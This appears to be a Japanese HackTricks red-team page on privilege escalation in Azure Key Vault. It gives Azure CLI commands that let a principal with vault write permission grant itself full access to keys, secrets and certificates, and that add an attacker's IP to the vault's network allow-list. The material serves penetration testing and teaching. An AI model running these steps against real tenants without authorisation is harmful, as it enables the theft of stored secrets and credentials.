Az - Key Vault Privesc

Reading time: 3 minutes

tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

Azure Key Vault

このサービスに関する詳細情報は、以下を確認してください:

Az - Key Vault

Microsoft.KeyVault/vaults/write

この権限を持つ攻撃者は、キー ボールトのポリシーを変更することができます(キー ボールトはRBACの代わりにアクセス ポリシーを使用している必要があります)。

bash
# If access policies in the output, then you can abuse it
az keyvault show --name <vault-name>

# Get current principal ID
az ad signed-in-user show --query id --output tsv

# Assign all permissions
az keyvault set-policy \
--name <vault-name> \
--object-id <your-object-id> \
--key-permissions all \
--secret-permissions all \
--certificate-permissions all \
--storage-permissions all

ネットワーク制限の変更

機密データ(シークレットの値など)にアクセスするのに十分な権限があるかもしれませんが、キー バルブが特定のネットワークに制限されているため、アクセスできない場合があります。ネットワーク制限を変更する権限がある場合は、許可された IP のリストに自分の IP を追加できます。

bash
# Get the current network restrictions
az keyvault network-rule list --name <vault-name>

# Add your IP to the list
az keyvault network-rule add --name <vault-name> --ip-address <your-ip>

tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする